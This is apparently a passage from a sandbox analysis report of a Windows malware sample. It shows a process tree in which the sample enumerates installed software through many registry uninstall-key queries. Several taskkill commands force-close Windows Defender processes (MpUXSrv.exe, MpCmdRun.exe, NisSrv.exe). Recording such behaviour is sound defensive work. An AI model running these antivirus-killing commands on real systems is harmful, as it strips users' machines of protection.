                                                                                                                                                                                                                    PID:2632
                                                                                                                                                                                                                • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                  PID:2484
                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:1512
                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:64
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:2676
                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:32
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:884
                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:2728
                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:2636
                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:2032
                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:2568
                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:2732
                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:2688
                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:2100
                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:2800
                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:2788
                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:2864
                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:64
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:2816
                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:32
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:2884
                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:2900
                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:2896
                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:2524
                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:2740
                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:2512
                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:1372
                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:2952
                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:2976
                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:3000
                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:3008
                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:3032
                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:3012
                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:1672
                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:3048
                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:2096
                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:2164
                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:568
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:2060
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                    PID:2212
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:512
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:2584
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:1872
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:2352
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:2648
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:1836
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:2556
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:2600
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:2372
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:1540
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:2404
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:2576
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:392
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:832
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:1932
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:428
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:268
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:3068
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:3016
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:2988
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                PID:2012
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:2024
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                    PID:1504
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                      PID:1704
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                      PID:2084
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:2040
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:1080
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                            PID:1284
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                PID:1980
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                  PID:1884
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                  PID:2016
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                      PID:2300
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                        PID:2204
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                        PID:1888
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                            PID:2324
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                              PID:2264
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                              PID:2360
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:2460
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:2552
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:2080
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:64
                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:1388
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:32
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:3024
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:2140
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:2256
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:2384
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:2276
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:380
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:2420
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                    PID:856
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:2132
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:1496
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:1056
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:644
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:2436
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:2232
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:2252
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:2500
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:2304
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:2488
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:2328
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
